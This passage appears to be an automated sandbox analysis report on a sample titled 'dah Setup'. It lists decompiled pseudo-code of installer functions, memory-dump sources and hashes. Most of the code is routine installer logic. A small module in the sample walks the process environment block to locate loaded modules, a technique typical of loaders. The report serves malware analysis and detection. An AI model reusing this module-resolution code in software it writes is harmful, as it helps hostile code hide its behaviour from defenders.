					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                        0x00406b36
                        0x00406b3e
                        0x00406b42
                        0x00406b44
                        0x00406b47
                        0x00406b49
                        0x00406b49
                        0x00406b4b
                        0x00406b52
                        0x00406b54
                        0x00406b54
                        0x00406b5a
                        0x00406b6f
                        0x00406b77
                        0x00406b79
                        0x00406b7b
                        0x00406b7e
                        0x00406b7f
                        0x00406b7f
                        0x00406b85
                        0x00000000
                        0x00000000
                        0x00406b87
                        0x00406b8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406b8a
                        0x00406b8e
                        0x00406b91
                        0x00406b93
                        0x00406b93
                        0x00406b96
                        0x00406b9c
                        0x00406b9d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406b9d
                        0x00406ba2
                        0x00406ba5
                        0x00406ba7
                        0x00406ba7
                        0x00406bad
                        0x00406baf
                        0x00406bc0
                        0x00406bb3
                        0x00406bb7
                        0x00406e5c
                        0x00000000
                        0x00406e5c
                        0x00406bbd
                        0x00406bbe
                        0x00406bbe
                        0x00406bc6
                        0x00406bc9
                        0x00406bcd
                        0x00406bcf
                        0x00406bd1
                        0x00406bd4
                        0x00000000
                        0x00000000
                        0x00406bdc
                        0x00406be2
                        0x00406be4
                        0x00406be6
                        0x00406be7
                        0x00406bfc
                        0x00406bfc
                        0x00406bff
                        0x00406c01
                        0x00406c01
                        0x00406c03
                        0x00406c08
                        0x00406c0a
                        0x00406c11
                        0x00406c13
                        0x00406c1b
                        0x00406c1b
                        0x00406c1d
                        0x00406c1e
                        0x00406c2d
                        0x00406c31
                        0x00406c35
                        0x00406c38
                        0x00406c3b
                        0x00406c40
                        0x00406c43
                        0x00406c49
                        0x00406c50
                        0x00406c56
                        0x00406e4f
                        0x00406e4f
                        0x00406e54
                        0x00406e63
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406e54
                        0x00406c63
                        0x00406c66
                        0x00406c69
                        0x00406c6c
                        0x00406c70
                        0x00000000
                        0x00000000
                        0x00406c7b
                        0x00406c7e
                        0x00406c7f
                        0x00406c81
                        0x00406c87
                        0x00406c8a
                        0x00000000
                        0x00000000
                        0x00406c90
                        0x00406c91
                        0x00406c94
                        0x00406c97
                        0x00406c9a
                        0x00406ca0
                        0x00406ca2
                        0x00406ca2
                        0x00406caa
                        0x00406cae
                        0x00406cb3
                        0x00406cd8
                        0x00406cde
                        0x00406ce0
                        0x00406ce2
                        0x00406ce5
                        0x00406cee
                        0x00000000
                        0x00000000
                        0x00406cb5
                        0x00406cb5
                        0x00406cbe
                        0x00406cc2
                        0x00000000
                        0x00000000
                        0x00406cd3
                        0x00406cd3
                        0x00406cd6
                        0x00000000
                        0x00000000
                        0x00406cc6
                        0x00406cc9
                        0x00406ccb
                        0x00406ccf
                        0x00000000
                        0x00000000
                        0x00406cd1
                        0x00406cd1
                        0x00000000
                        0x00406cd3
                        0x00406cf7
                        0x00406cfd
                        0x00406d07
                        0x00406d09
                        0x00406d0e
                        0x00406d10
                        0x00406d46
                        0x00406d12
                        0x00406d12
                        0x00406d15
                        0x00406d18
                        0x00406d22
                        0x00406d25
                        0x00406d2c
                        0x00406d37
                        0x00406d3e
                        0x00406d3e
                        0x00406d48
                        0x00406d4b
                        0x00406d4d
                        0x00406d53
                        0x00406d53
                        0x00406d5c
                        0x00406d5f
                        0x00406d64
                        0x00406d73
                        0x00406d7b
                        0x00406d80
                        0x00406da4
                        0x00406dac
                        0x00406db0
                        0x00406db6
                        0x00406d82
                        0x00406d90
                        0x00406d93
                        0x00406d99
                        0x00406d99
                        0x00406dba
                        0x00406d75
                        0x00406d75
                        0x00406d75
                        0x00406dcb
                        0x00406dcf
                        0x00406ddb
                        0x00406dd6
                        0x00406dd9
                        0x00406dd9
                        0x00406de3
                        0x00406de8
                        0x00406df0
                        0x00406dec
                        0x00406dee
                        0x00406dee
                        0x00406df6
                        0x00406df8
                        0x00406dff
                        0x00406e09
                        0x00406e13
                        0x00406e2f
                        0x00406e33
                        0x00406c78
                        0x00406c7e
                        0x00406c7f
                        0x00406c81
                        0x00406c87
                        0x00406c8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406e15
                        0x00406e15
                        0x00406e15
                        0x00406e1a
                        0x00406e23
                        0x00406e2c
                        0x00000000
                        0x00406e2c
                        0x00406e39
                        0x00406e39
                        0x00406e3c
                        0x00406e43
                        0x00406e46
                        0x00000000
                        0x00406c69
                        0x00406be9
                        0x00406beb
                        0x00406beb
                        0x00406bef
                        0x00406bf2
                        0x00406bf3
                        0x00406bf3
                        0x00000000
                        0x00406beb
                        0x00406b5f
                        0x00406b65
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                        • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                        • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                        • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B686, Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                        • Instruction ID: 74f19911b4ba014fad852a9812cf9d901db9f6d0f58e6470880e8bc093f3b0cb
                        • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                        • Instruction Fuzzy Hash: 5011E971A10105DFCB20DBA9C88896EF7FDEF4669079480AAF806D3355E774DE41C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B776, Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                        • Instruction ID: a73030215659ece0382385f56e23f145734efe5b50cf629dd5c1603ed2023b79
                        • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                        • Instruction Fuzzy Hash: B5E01A35B64609DFCB64CBA8CD81E15B3F8EF1A220B548294F916C73A0EA34EE00DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B7B4, Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E7333B7B4(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E7333B686( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}






                        0x7333b7c0
                        0x7333b7c2
                        0x7333b7c5
                        0x7333b7c7
                        0x7333b7d5
                        0x7333b7d9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x7333b7db
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                        • Instruction ID: 77be1d7ebc3eff38d6660ad68fb5e26a073f09480aaccd1c63cb6d90a784074f
                        • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                        • Instruction Fuzzy Hash: D7E08C367106108BC331DA19C980A82F3EAFF892F17AA886EF88AD7711C630FC01C650
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B737, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E7333B737() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                        0x7333b74a

                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403FCB, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x6e8212
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x6e6884
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x6e1110
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















                        0x00403fdb
                        0x00404101
                        0x0040415d
                        0x00404161
                        0x00404238
                        0x0040423a
                        0x0040423a
                        0x00404240
                        0x00404240
                        0x00404243
                        0x00000000
                        0x0040424a
                        0x0040416f
                        0x00404171
                        0x0040417b
                        0x00404186
                        0x00404189
                        0x0040418c
                        0x00404197
                        0x0040419a
                        0x004041a1
                        0x004041af
                        0x004041c7
                        0x004041da
                        0x004041ea
                        0x004041ec
                        0x004041ec
                        0x004041a1
                        0x004041f6
                        0x00000000
                        0x00404201
                        0x00404205
                        0x00404216
                        0x00404216
                        0x0040421c
                        0x0040422a
                        0x0040422a
                        0x00000000
                        0x0040422e
                        0x004041f6
                        0x0040410c
                        0x00000000
                        0x00404120
                        0x00404126
                        0x0040412c
                        0x00000000
                        0x00000000
                        0x00404151
                        0x00404153
                        0x00404158
                        0x00000000
                        0x00404158
                        0x0040410c
                        0x00403fe1
                        0x00403fe4
                        0x00403fe9
                        0x00403feb
                        0x00403ffa
                        0x00403ffa
                        0x00403ffc
                        0x00404001
                        0x00404004
                        0x00404006
                        0x0040400b
                        0x00404014
                        0x0040401a
                        0x00404026
                        0x00404029
                        0x00404032
                        0x00404037
                        0x0040403a
                        0x0040403f
                        0x00404056
                        0x0040405d
                        0x00404070
                        0x00404073
                        0x00404088
                        0x0040408a
                        0x0040408f
                        0x00404094
                        0x00404099
                        0x00404099
                        0x004040a8
                        0x004040b7
                        0x004040b9
                        0x004040cf
                        0x004040de
                        0x004040e0
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                        • String ID: N$TclpOwkq$open
                        • API String ID: 3615053054-1106227724
                        • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                        • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                        • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                        • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x6e1110
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "dah Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0x1b0226
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                        0x0040100a
                        0x00401039
                        0x00401047
                        0x0040104d
                        0x00401051
                        0x0040105b
                        0x00401061
                        0x00401064
                        0x004010f3
                        0x00401089
                        0x0040108c
                        0x004010a6
                        0x004010bd
                        0x004010cc
                        0x004010cf
                        0x004010d5
                        0x004010d9
                        0x004010e4
                        0x004010ed
                        0x004010ef
                        0x004010ef
                        0x00401100
                        0x00401105
                        0x0040110d
                        0x00401110
                        0x00401112
                        0x00401118
                        0x0040111f
                        0x00401126
                        0x00401130
                        0x00401142
                        0x00401156
                        0x00401160
                        0x00401165
                        0x00401165
                        0x00401110
                        0x0040116e
                        0x00000000
                        0x00401178
                        0x00401010
                        0x00401013
                        0x00401015
                        0x00401019
                        0x0040101f
                        0x0040101f
                        0x00000000

                        APIs
                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                        • BeginPaint.USER32(?,?), ref: 00401047
                        • GetClientRect.USER32 ref: 0040105B
                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                        • FillRect.USER32 ref: 004010E4
                        • DeleteObject.GDI32(?), ref: 004010ED
                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                        • SelectObject.GDI32(00000000,?), ref: 00401140
                        • DrawTextA.USER32(00000000,dah Setup,000000FF,00000010,00000820), ref: 00401156
                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                        • DeleteObject.GDI32(?), ref: 00401165
                        • EndPaint.USER32(?,?), ref: 0040116E
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                        • String ID: F$dah Setup
                        • API String ID: 941294808-2466855162
                        • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                        • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                        • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                        • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x6e1110
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                        0x0040591b
                        0x00405922
                        0x00405926
                        0x0040592f
                        0x00405933
                        0x00405a72
                        0x00405a72
                        0x00000000
                        0x00405a72
                        0x00405933
                        0x0040593f
                        0x00405955
                        0x0040597d
                        0x00405988
                        0x0040598c
                        0x004059ac
                        0x004059ae
                        0x004059b3
                        0x004059bd
                        0x004059ca
                        0x004059cf
                        0x004059d4
                        0x004059d8
                        0x00000000
                        0x00000000
                        0x004059e7
                        0x004059e9
                        0x004059f6
                        0x004059fa
                        0x00405a6b
                        0x00405a6c
                        0x00000000
                        0x00405a16
                        0x00405a23
                        0x00405a88
                        0x00405a8f
                        0x00405a36
                        0x00405a36
                        0x00405a38
                        0x00405a41
                        0x00405a4c
                        0x00405a5e
                        0x00405a65
                        0x00000000
                        0x00405a65
                        0x00405a91
                        0x00405a92
                        0x00405a97
                        0x00405a99
                        0x00405aa6
                        0x00405aa6
                        0x00405aaa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405a9b
                        0x00405a9b
                        0x00405a9e
                        0x00405aa1
                        0x00405aa2
                        0x00000000
                        0x00405a9b
                        0x00405a2e
                        0x00405a33
                        0x00000000
                        0x00405a33
                        0x004059fa
                        0x00405957
                        0x00405962
                        0x0040596b
                        0x0040596f
                        0x00000000
                        0x00000000
                        0x0040596f
                        0x00405a7c

                        APIs
                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                        • GetShortPathNameA.KERNEL32 ref: 0040596B
                        • GetShortPathNameA.KERNEL32 ref: 00405988
                        • wsprintfA.USER32 ref: 004059A6
                        • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
